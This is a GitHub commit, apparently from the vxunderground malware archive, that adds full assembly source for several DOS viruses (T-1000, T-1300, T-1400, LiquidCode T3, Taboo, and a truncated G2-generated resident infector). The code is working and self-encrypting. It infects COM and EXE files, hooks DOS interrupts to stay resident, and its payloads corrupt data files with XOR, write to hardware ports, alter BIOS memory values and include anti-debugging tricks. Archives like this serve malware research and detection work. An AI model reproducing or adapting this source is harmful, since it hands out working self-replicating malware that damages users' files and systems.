
Add files via upload

This commit is contained in:
vxunderground 2021-01-12 18:01:59 -06:00 committed by GitHub
parent 5dd4938a52
commit 3e7d2e8262
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
99 changed files with 45150 additions and 0 deletions

@ -0,0 +1,95 @@
;
; T-1000 Virus
;
; This virus is a Non-Resident Overwriting Self-Encrypting .COM File Inctector.
; When an infected program is started, the virus will infect all files in the
; current directory and use the time counter for its encryption. It displays
; the text "T-1000" when it is ready infecting.
Code Segment para 'code'
Assume Cs:Code,Ds:Code
Length Equ Offset EndByte-Offset Main
Org 100h
Main: Mov Si,Offset Decrypt
Mov Di,Si
Mov Cl,Offset EndByte-Offset Decrypt
On2: Lodsb
Db 34h
Crypt Db 0
Stosb
Dec Cl
Cmp Cl,0ffh
Jne On2
Decrypt:
Mov Ah,4eh
Push Ax
Encr:
Mov Ah,2ch
Int 21h
Mov Crypt,Dl
Mov Si,Offset Decrypt
Mov Di,Offset EndByte+10
Mov Cx,Offset EndByte-Offset Decrypt
On3: Lodsb
Xor Al,Crypt
Stosb
Dec Cx
Cmp Cx,0ffffh
Jne On3
Pop Ax
On1: Xor Cx,Cx
Mov Dx,Offset Nam
Int 21h
Jc Einde
Mov Ax,3d01h
Mov Dx,9eh
Int 21h
Mov Bx,Ax
Mov Ah,40h
Push Ax
Mov Cx,Offset Decrypt-Offset Main
Mov Dx,Offset Main
Int 21h
Pop Ax
Mov Cx,Offset EndByte-Offset Decrypt
Mov Dx,Offset EndByte+10
Int 21h
Mov Ah,3eh
Int 21h
Mov Ah,4fh
Push Ax
Jmp Short Encr
Einde:
Mov Ah,9
Mov Dx,Offset Msg
Push Cs
Pop Ds
Int 21h
Int 20h
Msg Db 'T-1000$'
Nam Db '*.Com',0
EndByte Db 0
Code Ends
End Main
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

@ -0,0 +1,79 @@
;
; T-1300 Virus
;
; This is a non-resident overwriting self-encrypting semi-mutating .exe file
; infector. When an infected program is run, the virus will infect all the
; file in the current directory and displays "T-1300" when finished with
; infecting. This is a bit more advanced virus than "T-1000" and a wildcard
; scanstring is needed to find this virus.
;
S_1: Lea Si,Main
Mov Cx,MainLen
Length Equ $-2
Decrypt: Xor B [Si],0
CryptByte Equ $-1
S_2 Equ $-2
S_3: Inc Si
S_4: Loop Decrypt
CryptLen Equ $-S_1
Main: Mov Ah,4eh
SeekNext: Lea Dx,FileSpec
Xor Cx,Cx
Int 21h
Jc Einde
Mov Ax,3d02h
Mov Dx,09eh
Int 21h
Xchg Ax,Bx
Mov Ds,Cx
Inc Cx
Mov Ah,B Ds:[46ch]
Mov Ds,Cs
Mov B CryptByte,Ah
Test Ah,1
Jne NoReg
Xor B S_1,Cl
Xor B S_2,Cl
Xor B S_3,Cl
NoReg: Test Ah,2
Jne NoXor
Xor B Decrypt,2
NoXor: Test Ah,4
Jne NoLoop
Xor B S_4,2
NoLoop: Lea Si,Main
Lea Di,CryptPart
Mov Cx,MainLen
Push Cx
CodeIt: Lodsb
Xor Al,Ah
Stosb
Loop CodeIt
Pop Cx
And Ax,03fffh
Add Cx,Ax
Mov W Length,Cx
Mov Ah,40h
Lea Dx,S_1
Mov Cx,CryptLen
Int 21h
Mov Ah,40h
Lea Dx,CryptPart
Mov Cx,MainLen
Int 21h
Mov Ah,3eh
Int 21h
Mov Ah,4fh
Jmp SeekNext
Einde: Mov Ah,9
Lea Dx,Msg
Int 21h
Ret
FileSpec Db '*.EXE',0
Msg Db 'T-1300$'
MainLen Equ $-Main
CryptPart Equ $

@ -0,0 +1,143 @@
;
; T-1400 Virus
;
; This is a non-resident overwriting self-encrypting semi-mutating .COM file
; infector. When an infected program is run, the virus will infect all the
; file in the current directory and displays a TridenT logo when finished with
; infecting. This is a bit more advanced virus than "T-1300" and a wildcard
; scanstring is needed to find this virus. It now utilizes three types of
; encryption, instead of only the XOR loop. it now utilizes ADD, ADC, SUB and
; SBB. the increment SI has now a new
; possibility, CMPSB.
;
Beg:
Mov Cx,MainLen
Length Equ $-2
S_1: Lea Si,Main
Zaken: Clc
Decrypt: Xor B [Si],0
CryptByte Equ $-1
S_2 Equ $-2
S_3: Inc Si
S_4: Loop Zaken
CryptLen Equ $-Beg
Main: Mov Ah,4eh
SeekNext: Lea Dx,FileSpec
Xor Cx,Cx
Int 21h
Jnc Yup
Jmp Einde
Yup: Mov Ax,3d02h
Mov Dx,09eh
Int 21h
Xchg Ax,Bx
Mov Ds,Cx
Inc Cx
Mov Ax,W Ds:[46ch]
Mov Ds,Cs
Mov B CryptByte,Ah
Mov B Zaken,0f8h
Mov B What,1
Mov B S_2,34h
Test Al,1
Jne NotXor
Test Al,32
Jne Done
Xor B Zaken,1
Jmp Done
NotXor: Mov B What,2
Mov B S_2,04h
Test Al,2
Je Done
Test Al,4
Je ItsAdc
Mov B What,3
Mov B S_2,2ch
Test Al,8
Je Done
Sub B S_2,20h
ItsAdc: Add B S_2,10h
Done: Mov B S_1,0beh
Cmp Ah,80h
Ja NoCMPSB
Mov B S_3,0A6h
Jmp Next
NoCMPSB: Mov B S_3,46h
Next: Test Ah,1
Jne NoReg
Xor B S_1,Cl
Xor B S_2,Cl
Cmp Ah,80h
Jbe NoReg
Xor B S_3,Cl
NoReg: Test Ah,2
Jne NoXor
Xor B Decrypt,2
NoXor: Test Ah,4
Jne NoLoop
Xor B S_4,2
NoLoop: Test Ah,8
Jne Ok
Mov B S_4,0E2h
Ok: Lea Si,Main
Lea Di,CryptPart
Mov Cx,MainLen
Push Cx
CodeIt: Lodsb
Cmp B What,1
Jne NeXor
Xor Al,Ah
Jmp Stor
NeXor: Cmp B What,2
Jne NeSub
Sub Al,Ah
Jmp Stor
NeSub: Add Al,Ah
Stor: Stosb
Loop CodeIt
Pop Cx
And Ax,03fffh
Add Cx,Ax
Mov W Length,Cx
Mov Ah,40h
Lea Dx,Beg
Mov Cx,CryptLen
Int 21h
Mov Ah,40h
Lea Dx,CryptPart
Mov Cx,MainLen
Int 21h
Mov Ah,3eh
Int 21h
Mov Ah,4fh
Jmp SeekNext
What Db 0
Einde:
Mov Al,3
Int 10h
Lea Si,Y
R: Lodsb
Mov Cl,8
C: Rol Al,1
Push Ax
Mov Al,32
If C Mov Al,219
Int 29h
Int 29h
Pop Ax
Loop C
Cmp Si,E
Jne R
Ret
Y: db 125,231,121,244,95,17,18,69,6,68,17,226,69,197,68,17,18,69,4,196,17,23,121,244,68
E:
FileSpec Db '*.COM',0
Msg Db 'T-1400'
MainLen Equ $-Main
CryptPart Equ $

@ -0,0 +1,361 @@
;LiquidCode --- T3
;
; Virus
;This version:
;Searches current directory for non-infected com files, if any found
;it will become infected!
;This virus has a routine which self-destructs itself and uninfects
;the file.
assume cs:code
.286
code segment "code"
org 0100h
start proc
jmp v_start ;first 5 bytes |
nop ; |
nop ; |
v_start:
call $+3 ;Actual virus
pop dx
sub dx, 3
push dx ;save relocation factor in BP
pop bp ;so virus can be copied anywhere twoards
mov si, dx ;the end of the file
;
; Replace first 5 bytes in memory with original
; program code so normal program can run later
add si, first_five
mov di, 0100h
mov cx, 5
lodsb
stosb
loop $-2
;see if user want to disinfect this file
; mov si, 82h
; lodsb
; cmp al, "[" ;is al the code to disinfect? "["
; jne ok_dont_disinfect
; jmp self_kill
ok_dont_disinfect:
;here should be date checks to see
;if an evil function should be unleashed!!
mov ah, 2ah
int 21h
;cx year 1980-2099
;dh month 1-12
;dl day
;al day of week 0=sun 1=mon -> 7=sat
cmp dh, 12
jne notdec
cmp dl, 25
jne notdec
jmp christmas
notdec:
cmp dh, 4
jne notapril
cmp dl, 1
jne notapril
; jmp aprilfools
notapril:
;Set the DTA
call set_dta
;find first file to ?infect?
call find_first_file
go_again:
mov si, bp
add si, size_
lodsw
cmp ax, 5
ja gd4
jmp resrch
gd4:
call open_file
mov bx, ax
mov al, 0
call date_time
mov ah, 3fh
mov cx, 5
mov dx, bp
add dx, first_five
int 21h
;**** mov ax, 4202h
mov cx, 0
mov ax, 4202h
mov dx, cx
int 21h
sub ax, 3
mov si, bp
add si, new_5
mov [si+1], ax
mov si, bp
mov di, si
add si, chkmark
add di, mark
mov cx, 2
repe cmpsb
jne INFECT
;File found was previously infected!
; search for new one now.
jmp resrch
wipe_name:
push di
push ax
push cx
mov di, bp
add di, name_
mov cx, 13
mov al, 0
rep stosb
pop cx
pop ax
pop di
ret
resrch:
call wipe_name
mov ah, 4fh
int 21h
jnc gd3
jmp term_virus
gd3:
jmp go_again
INFECT:
;Time to infect the file!!
mov si, bp
add si, handle
mov bx, [si]
mov cx, vsize
mov dx, bp
call wipe_name
mov ax, 4000h
int 21h
mov ax, 4200h
mov cx, 0
mov dx, cx
int 21h
mov dx, bp
add dx, new_5
mov ax, 4000h
mov cx, 5
int 21h
mov al, 1
call date_time
mov ax, 3e00h
int 21h
jmp resrch
fndnam proc
mov si, env
mov ax, [si]
mov es, ax
mov ds, ax
mov si, 0
mov di, si
__lp:
lodsb
cmp al, 0
je chknxt
stosb
jmp __lp
chknxt:
stosb
lodsb
cmp al, 0
je fnd1
stosb
jmp __lp
fnd1:
stosb
__lp2:
lodsb
cmp al, "a"
jae ff_
up2:
cmp al, "A"
jae fff_
up3:
stosb
jmp __lp2
ff_:
cmp al,"z"
jbe fnd
jmp up2
fff_:
cmp al, "Z"
jbe fnd
jmp up3
fnd:
mov si, di
mov al, 0
repne scasb
mov dx, si
mov di, dx
ret
env equ 2ch
fndnam endp
self_kill:
;this procedure disinfects specified files
;SI points to the name of current file on disk
;which is infected
call fndnam ;find name of current file from env block in memory
jmp gd__
abrt:
int 20h
gd__:
mov ax, 3d02h
int 21h
jc abrt
mov bx, ax
mov ax, cs
mov ds, ax
mov es, ax
mov cx, 5
mov dx, bp
add dx, first_five
call wipe_name
mov ax, 4000h
int 21h
jc abrt
mov dx, 0
mov cx, 0
mov ax, 4202h
int 21h
jnc gd__1
jmp abrt
gd__1:
sub ax, vsize
mov dx, ax
mov cx, 0
mov ax, 4200h
int 21h
call wipe_name
mov cx, 0
mov ax, 4000h
int 21h
mov ax, 3e00h
int 21h
jmp term_virus
date_time:
pusha
mov ah, 57h
cmp al, 0
je fnd__$
mov di, bp
mov si, di
add di, date
add si, time
mov dx, [di]
mov cx, [si]
int 21h
jmp ret__
fnd__$:
int 21h
mov si, bp
mov di, bp
add si, time
add di, date
mov [si], cx
mov [di], dx
ret__:
popa
ret
open_file:
mov dx, bp
add dx, name_
mov ax, 3d02h
int 21h
jnc gd2
jmp term_virus
gd2:
mov si, bp
add si, handle
mov [si], ax
ret
find_first_file:
mov dx, bp
mov cx, 0
mov ah, 4eh
add dx, all_com_files
int 21h
jnc gd1
jmp term_virus
gd1:
ret
set_dta:
mov dx, bp
mov ah, 1ah
add dx, dta
int 21h
ret
term_virus:
mov ax, 0
mov bx, ax
mov cx, bx
mov dx, cx
mov si, 0100h
mov di, -1
mov bp, di
push 0100h
ret
CHRISTMAS:
;Program Lockup
; Exit without running program
int 20h
;APRILFOOLS:
;Ha Ha delete current file
; call fndnam
; mov ah, 41h
; int 21h
; mov ax, cs
; mov ds, ax
; mov es, ax
; jmp term_virus
; Data Bank
_fstfive:
int 20h
nop
ckmrk:
nop
nop
acf db "*.COM",0
dt_ dw 0
tme dw 0
d_t_a:
rfd db 21 dup (0)
att db 0
dw 0
dw 0
sz dd 0
n_me db 13 dup (0),0
handl dw 0
nw_5 db 0e9h,0,0
mrk db "<T3> "
strain db "<tm>LiquidCode 92"
;
end___:
first_five = offset _fstfive-0105h
all_com_files = offset acf-0105h
dta = offset d_t_a-0105h
attribute = offset att-0105h
time = offset tme-0105h
date = offset dt_-0105h
size_ = offset sz-0105h
name_ = offset n_me-0105h
handle = offset handl-0105h
new_5 = offset nw_5-0105h
mark = offset mrk-0105h
chkmark = offset ckmrk-0105h
vsize = offset end___-0105h
start endp
code ends
end start

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

@ -0,0 +1,539 @@
; TABOO.ASM -- Taboo Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Virucidal Maniac
virus_type equ 2 ; Spawning Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
start label near
main proc near
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
stop_tracing: mov cx,09EBh
mov ax,0FE05h ; Acutal move, plus a HaLT
jmp $-2
add ah,03Bh ; AH now equals 025h
jmp $-10 ; Execute the HaLT
mov bx,offset null_vector ; BX points to new routine
push cs ; Transfer CS into ES
pop es ; using a PUSH/POP
int 021h
mov al,1 ; Disable interrupt 1, too
int 021h
jmp short skip_null ; Hop over the loop
null_vector: jmp $ ; An infinite loop
skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged
lock_keys: mov al,128 ; Change here screws DEBUG
out 021h,al ; If tracing then lock keyboard
mov ah,04Ah ; DOS resize memory function
mov bx,(finish - start) / 16 + 0272h ; BX holds # of para.
int 021h
mov sp,(finish - start) + 01100h ; Change top of stack
mov si,offset spawn_name ; SI points to true filename
int 02Eh ; DOS execution back-door
push ax ; Save return value for later
mov ax,cs ; AX holds code segment
mov ds,ax ; Restore data segment
mov es,ax ; Restore extra segment
mov cx,0003h ; Do 3 infections
search_loop: push cx ; Save CX
call search_files ; Find and infect a file
pop cx ; Restore CX
loop search_loop ; Repeat until CX is 0
xor ah,ah ; BIOS get time function
int 01Ah
test dx,0001h ; Is timer divisible by 2?
jne no_infection ; If not then don't spread
call search_files ; Find and infect a file
no_infection:
call get_day
cmp ax,000Fh ; Did the function return 15?
je strt00 ; If equal, do effect
call get_cpu
cmp ax,01E6h ; Did the function return 486?
je strt00 ; If equal, do effect
jmp end00 ; Otherwise skip over it
strt00: xor ah,ah ; BIOS get time function
int 1Ah
xchg dx,ax ; AX holds low word of timer
mov dx,0FFh ; Start with port 255
out_loop: out dx,al ; OUT a value to the port
dec dx ; Do the next port
jne out_loop ; Repeat until DX = 0
end00: call get_minute
cmp ax,001Eh ; Did the function return 30?
jg strt01 ; If greater, do effect
jmp end01 ; Otherwise skip over it
strt01: mov cx,000Ah ; First argument is 10
new_shot: push cx ; Save the current count
mov dx,0140h ; DX holds pitch
mov bx,0100h ; BX holds shot duration
in al,061h ; Read the speaker port
and al,11111100b ; Turn off the speaker bit
fire_shot: xor al,2 ; Toggle the speaker bit
out 061h,al ; Write AL to speaker port
add dx,09248h ;
mov cl,3 ;
ror dx,cl ; Figure out the delay time
mov cx,dx ;
and cx,01FFh ;
or cx,10 ;
shoot_pause: loop shoot_pause ; Delay a bit
dec bx ; Are we done with the shot?
jnz fire_shot ; If not, pulse the speaker
and al,11111100b ; Turn off the speaker bit
out 061h,al ; Write AL to speaker port
mov bx,0002h ; BX holds delay time (ticks)
xor ah,ah ; Get time function
int 1Ah ; BIOS timer interrupt
add bx,dx ; Add current time to delay
shoot_delay: int 1Ah ; Get the time again
cmp dx,bx ; Are we done yet?
jne shoot_delay ; If not, keep checking
pop cx ; Restore the count
loop new_shot ; Do another shot
end01: call get_rollover
cmp ax,0001h ; Did the function return 1?
je strt02 ; If equal, do effect
jmp end02 ; Otherwise skip over it
strt02: mov dx,00C8h ; First argument is 200
push es ; Save ES
mov ax,040h ; Set extra segment to 040h
mov es,ax ; (ROM BIOS)
mov word ptr es:[013h],dx ; Store new RAM ammount
pop es ; Restore ES
end02: call get_day
cmp ax,0007h ; Did the function return 7?
jg strt03 ; If greater, do effect
jmp end03 ; Otherwise skip over it
strt03: xor bx,bx ; Clear BX
mov si,0001h ; Second argument is 1
push es ; Save ES
xor ax,ax ; Set the extra segment to
mov es,ax ; zero (ROM BIOS)
shl bx,1 ; Convert to word index
shl si,1 ; Convert to word index
mov ax,word ptr [bx + 03FEh]; Zero COM port address
xchg word ptr [si + 03FEh],ax; Put first value in second,
mov word ptr [bx + 03FEh],ax; and second value in first!
pop es ; Restore ES
end03: call get_dos_version
or ax,ax ; Did the function return zero?
jg strt04 ; If greater, do effect
jmp end04 ; Otherwise skip over it
strt04: mov dx,offset data00 ; DX points to data
push bp ; Save BP
mov bp,sp ; BP points to stack frame
sub sp,4096 ; Allocate 4096-byte buffer
push di ; Save DI
mov ah,02Fh ; DOS get DTA function
int 021h
mov di,bx ; DI points to DTA
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
int 021h
jc corrupt_end ; If no files found then exit
corrupt_file: mov ax,04301h ; DOS set file attributes function
xor cx,cx ; File will have no attributes
lea dx,[di + 01Eh] ; DX points to file name
int 021h
mov ax,03D02h ; DOS open file function, r/w
lea dx,[di + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; Transfer file handle to AX
c_crypt_loop: mov ah,03Fh ; DOS read from file function
mov cx,4096 ; Read 4k of characters
lea dx,[bp - 4096] ; DX points to the buffer
int 021h
or ax,ax ; Were 0 bytes read?
je close_c_file ; If so then close it up
push ax ; Save AX
lea si,[bp - 4096] ; SI points to the buffer
xor ah,ah ; BIOS get clock ticks function
int 01Ah
pop cx ; CX holds number of bytes read
push cx ; Save CX
corrupt_bytes: xor byte ptr [si],dl ; XOR byte by clock ticks
inc si ; Do the next byte
inc dx ; Change the key for next byte
loop corrupt_bytes ; Repeat until buffer is done
pop dx ; Restore DX (holds bytes read)
push dx ; Save count for write
mov ax,04201h ; DOS file seek function, current
mov cx,0FFFFh ; Seeking backwards
neg dx ; Seeking backwards
int 021h
mov ah,040h ; DOS write to file function
pop cx ; CX holds number of bytes read
lea dx,[bp - 4096] ; DX points to the buffer
int 021h
jmp short c_crypt_loop
close_c_file: mov ax,05701h ; DOS set file date/time function
mov cx,[di + 016h] ; CX holds old file time
mov dx,[di + 018h] ; DX holds old file data
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attributes function
xor ch,ch ; Clear CH for attributes
mov cl,[di + 015h] ; CL holds old attributes
lea dx,[di + 01Eh] ; DX points to file name
int 021h
mov ah,04Fh ; DOS find next file function
int 021h
jnc corrupt_file ; If successful do next file
corrupt_end: pop di ; Restore DI
mov sp,bp ; Deallocate local buffer
pop bp ; Restore BP
end04: pop ax ; AL holds return value
mov ah,04Ch ; DOS terminate function
int 021h
main endp
db 0C3h,0FDh,0C2h,0F3h,0C7h
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
mov dx,offset root ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
mov dx,offset all_files ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
mov dx,offset up_dir ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
leave_traverse:
mov dx,offset exe_mask ; DX points to "*.EXE"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
exe_mask db "*.EXE",0 ; Mask for all .EXE files
traverse endp
db 075h,03Dh,0BDh,095h,0EAh
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
db 0E7h,096h,07Dh,03Ch,0BEh
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov di,bx ; DI points to the DTA
lea si,[di + 01Eh] ; SI points to file name
mov dx,si ; DX points to file name, too
mov di,offset spawn_name + 1; DI points to new name
xor ah,ah ; AH holds character count
transfer_loop: lodsb ; Load a character
or al,al ; Is it a NULL?
je transfer_end ; If so then leave the loop
inc ah ; Add one to the character count
stosb ; Save the byte in the buffer
jmp short transfer_loop ; Repeat the loop
transfer_end: mov byte ptr [spawn_name],ah; First byte holds char. count
mov byte ptr [di],13 ; Make CR the final character
mov di,dx ; DI points to file name
xor ch,ch ;
mov cl,ah ; CX holds length of filename
mov al,'.' ; AL holds char. to search for
repne scasb ; Search for a dot in the name
mov word ptr [di],'OC' ; Store "CO" as first two bytes
mov byte ptr [di + 2],'M' ; Store "M" to make "COM"
mov byte ptr [set_carry],0 ; Assume we'll fail
mov ax,03D00h ; DOS open file function, r/o
int 021h
jnc infection_done ; File already exists, so leave
mov byte ptr [set_carry],1 ; Success -- the file is OK
mov ah,03Ch ; DOS create file function
mov cx,00100111b ; CX holds file attributes (all)
int 021h
xchg bx,ax ; BX holds file handle
call encrypt_code ; Write an encrypted copy
mov ah,03Eh ; DOS close file function
int 021h
infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed
ret ; Return to caller
spawn_name db 12,12 dup (?),13 ; Name for next spawn
set_carry db ? ; Set-carry-on-exit flag
infect_file endp
db 08Dh,0EDh,035h,0A0h,000h
get_cpu proc near
mov dx,86 ; Assume it's an 8088/8086
push sp
pop ax
cmp sp,ax
jne get_cpu_end ; If the test failed then exit
mov dx,286 ; Assume it's an 80286
pushf
pop ax
or ax,04000h
popf
pushf
pop ax
test ax,04000h
jne get_cpu_end ; If the test failed then exit
mov dx,386 ; Assume it's an 80386
.386c ; We have to use 386 instructions
mov ebx,esp
and esp,0FFFCh
pushfd
pop eax
mov ecx,eax
xor ax,0004h
push eax
popfd
pushfd
pop eax
and eax,0004h
and ecx,0004h
cmp eax,ecx
je is_386 ; If the test failed it's a 386
mov dx,486 ; It must be a 80486 then
is_386: push ecx
popfd
mov esp,ebx
get_cpu_end: xchg dx,ax ; Transfer chip type to AX
ret ; Return to caller
get_cpu endp
db 0F6h,016h,05Ch,072h,084h
get_day proc near
mov ah,02Ah ; DOS get date function
int 021h
mov al,dl ; Copy day into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_day endp
db 0C6h,02Eh,047h,0ACh,053h
get_dos_version proc near
mov ah,030h ; DOS get DOS version function
int 021h
mov bx,ax ; Save return value in BX
xor bl,bl ; Clear DOS major version in BX
xchg bh,bl ; Place 0 in BH, minor in BL
cbw ; Sign-extend AL into AX
mov cl,100 ; CL holds multiplier
mul cl ; Multiply AL by 100
add ax,bx ; Add back the minor version
ret ; Return to caller
get_dos_version endp
db 03Ah,06Fh,04Ah,03Dh,091h
get_minute proc near
mov ah,02Ch ; DOS get time function
int 021h
mov al,cl ; Copy minute into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_minute endp
db 02Ah,0D1h,031h,0C6h,081h
get_rollover proc near
push es ; Save ES
mov ax,040h ; Set the extra segment to
mov es,ax ; 040h (ROM BIOS)
mov al,byte ptr [0070h] ; AL holds rollover flag
cbw ; Sign-extend AL into AX
pop es ; Restore ES
ret ; Return to caller
get_rollover endp
data00 db "*.Dat"
vcl_marker db "[VCL]",0 ; VCL creation marker
note db "Taboo Virus"
db "Version 2.12"
db "By Virucidal Maniac"
encrypt_code proc near
mov si,offset encrypt_decrypt; SI points to cipher routine
xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 8],dx ; Low word of timer is new key
xor byte ptr [si],1 ;
xor byte ptr [si + 7],1 ; Change all SIs to DIs
xor word ptr [si + 10],0101h; (and vice-versa)
mov di,offset finish ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes
mov si,offset write_stuff ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again
mov ah,040h ; DOS write to file function
mov dx,offset start ; DX points to virus
call finish ; Encrypt/write/decrypt
ret ; Return to caller
write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp
end_of_code label near
encrypt_decrypt proc near
mov si,offset start_of_code ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main

@ -0,0 +1,313 @@
; Virus generated by Gý 0.70á
; Gý written by Dark Angel of Phalcon/Skism
; File: TARGET.ASM
; [Gý Virus] by Phalcon/Skism
checkres1 = 'FF'
checkres2 = 'FF'
id = 'FF'
.model tiny
.code
; Assemble with:
; TASM /m3 filename.ASM
; TLINK filename.OBJ
; EXE2BIN filename.EXE filename.COM
org 0000h
start:
call next
next:
pop bp
sub bp, offset next
push es
push ds
mov ax, checkres1 ; Installation check
int 0021h
cmp ax, checkres2 ; Already installed?
jz done_install
mov ah, 004Ah ; alter memory allocation
mov bx, 0FFFFh ; of segment at ES
int 0021h
sub bx, (endheap-start+15)/16+1
mov ah, 004Ah ; alter memory allocation
int 0021h
jc done_install
sub word ptr ds:[0002h], (endheap-start+15)/16+1
mov ah, 0048h ; Allocate memory for the virus
mov bx, (endheap-start+15)/16
int 0021h
jc done_install
mov es, ax
dec ax
mov ds, ax ; Get MCB
mov byte ptr ds:[0000h], 'Z' ; Mark end of chain
mov word ptr ds:[0001h], 0008h ; Mark owner = DOS
push cs
pop ds
xor di, di
mov cx, (heap-start)/2+1 ; Bytes to move
mov si, bp ; lea si,[bp+offset start]
rep movsw
xor ax, ax
mov ds, ax
push ds
lds ax, ds:[21h*4] ; Get old int handler
mov word ptr es:oldint21, ax
mov word ptr es:oldint21+2, ds
pop ds
mov word ptr ds:[21h*4], offset int21 ; Replace with new handler
mov ds:[21h*4+2], es ; in high memory
done_install:
pop es
pop ds
cmp sp, id
jne restore_COM
restore_EXE:
mov ax, es
add ax, 0010h
add cs:[bp+word ptr origCSIP+2], ax
add ax, cs:[bp+word ptr origSPSS]
cli
mov ss, ax
mov sp, cs:[bp+word ptr origSPSS+2]
sti
db 00EAh
origCSIP db ?
old3 db 0cdh,20h,0
origSPSS dd ?
restore_COM:
mov di, 0100h
push di
lea si, [bp+offset old3]
movsw
movsb
ret
INT24:
mov al, 0003h
iret
int21:
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
